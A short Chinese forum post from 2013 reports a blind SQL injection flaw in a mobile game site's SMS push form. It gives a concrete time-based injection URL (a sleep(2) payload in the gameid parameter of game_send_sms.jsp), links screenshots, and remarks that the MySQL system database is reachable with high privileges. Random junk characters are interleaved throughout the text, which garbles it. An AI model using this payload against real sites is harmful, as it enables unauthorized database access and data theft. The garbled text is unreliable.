简要描述:
, X O6 M4 V3 @# R2 e' r+ o凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
- x% r, m. C$ f2 t! F/ a) p8 l% Z! `& e0 K1 h0 v( ~ a
详细说明:
+ z) a' y- a# n" M* `存在SQL盲注url:
+ t- y- d6 o0 |9 ~- Zfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
4 r5 j3 `: n1 Y& @' J/ Z" }http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png* b, S \ D) f- x" \: V; T B
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
0 R3 C! n. d1 Q. E3 L, n4 }- J" `, Jhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg0 G7 ~8 F, b: N e E& v' I6 ?2 y
; M; A/ ]$ g9 h/ q7 R8 N0 U3 h
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对